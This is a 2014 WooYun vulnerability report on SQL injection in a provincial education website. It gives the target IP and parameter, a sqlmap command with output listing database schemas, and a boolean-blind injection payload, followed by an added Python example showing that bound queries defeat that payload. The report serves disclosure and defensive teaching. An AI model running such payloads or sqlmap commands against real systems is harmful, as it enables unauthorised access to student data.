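Vulnerability Summary
Bug ID: wooyun-2014-064949
Title: SQL injection in a provincial high school student service platform
Vendor: Henan Provincial Department of Education
Author: Kuuki
Submitted: 2014-06-16 17:31
Fixed: 2014-07-31 17:32
Disclosed: 2014-07-31 17:32
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Handed over to a third-party partner organization (cncert, the National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none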
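Vulnerability Details
Disclosure status:
2014-06-16: Details sent to the vendor, awaiting vendor handling
2014-06-21: Vendor confirmed; details visible to the vendor only
2014-07-01: Details disclosed to core white hats and experts in related fields
2014-07-11: Details disclosed to regular white hats
2014-07-21: Details disclosed to intern white hats
2014-07-31: Details disclosed to the public
Brief description:
....
Detailed description:
I happened to see a friend checking their academic proficiency test scores on this website,
so I ran a quick test...
Injection point
"http://218.29.79.80/senior/policy/?type=02"
Proof of vulnerability: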
C:\Users\H-Kuuki>sqlmap.py -u "http://218.29.79.80/senior/policy/?type=02" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws. Developer
s assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:11:26
[21:11:26] [INFO] resuming back-end DBMS 'oracle'
[21:11:26] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=02' AND 6644=6644 AND 'GflB'='GflB
---
[21:11:27] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[21:11:27] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[21:11:27] [INFO] fetching database (schema) names
[21:11:27] [INFO] fetching number of databases
[21:11:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' fo
r faster data retrieval
[21:11:27] [INFO] retrieved:
[21:11:28] [WARNING] reflective value(s) found and filtering out
3
[21:11:33] [INFO] retrieved: SEMIS
[21:12:10] [INFO] retrieved: SYS
[21:12:34] [INFO] retrieved: SYSTEM
available databases [3]:
[*] SEMIS
[*] SYS
[*] SYSTEM
[21:13:18] [INFO] fetched data logged to text files under 'D:\sqlmap\output\218.29.79.80'
[*] shutting down at 21:13:18
Fix:
Filter the input, and quickly - -
Copyright notice: please credit the source when reposting: Kuuki@WooYun
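Added example, not part of the original report or the site's code: the payload sqlmap reported for the type parameter, run against a concatenated query and against a bind-variable query with allow-list validation. Assumptions: SQLite stands in for the Oracle back end so the example runs offline, and the table, column and function names and the two-digit format of type are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE policy (type TEXT, title TEXT)")
    db.executemany("INSERT INTO policy VALUES (?, ?)",
                   [("01", "Enrollment notice"), ("02", "Exam policy")])
    return db

def list_vulnerable(db, type_param):
    # "Before" form: the request value is concatenated into the SQL text,
    # so a quote inside it closes the literal and the rest is parsed as SQL.
    sql = "SELECT title FROM policy WHERE type = '" + type_param + "'"
    return [row[0] for row in db.execute(sql)]

def list_bound(db, type_param):
    # Bind variable: the value is compared as data and never parsed as SQL.
    sql = "SELECT title FROM policy WHERE type = ?"
    return [row[0] for row in db.execute(sql, (type_param,))]

TYPE_RE = re.compile(r"[0-9]{2}")  # assumed format, inferred from type=02

def list_hardened(db, type_param):
    # Second layer: allow-list validation before the bound query.
    if not TYPE_RE.fullmatch(type_param):
        raise ValueError("invalid type parameter")
    return list_bound(db, type_param)

# Payload reported by sqlmap above, and a constructed always-false twin.
TRUE_PROBE = "02' AND 6644=6644 AND 'GflB'='GflB"
FALSE_PROBE = "02' AND 6644=6645 AND 'GflB'='GflB"

def responses_differ(query, db):
    # A boolean-based blind finding needs the two probes to yield different pages.
    return query(db, TRUE_PROBE) != query(db, FALSE_PROBE)

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", responses_differ(list_vulnerable, db))
    print("bound:", responses_differ(list_bound, db))
```

With the bound query both probes are treated as an unknown type value and return the same empty result, so the true/false difference that the boolean-based blind technique depends on disappears.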
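Vulnerability Response
Vendor response:
Severity: High
Vulnerability Rank: 12
Confirmed: 2014-06-21 12:49
Vendor reply:
CNVD confirmed and reproduced the situation described. It has been handed to CNCERT and forwarded to the Qinghai sub-center, which will follow up with the organization that manages the website to handle it. Scored as an information disclosure risk, rank 12.
Latest status:
None yet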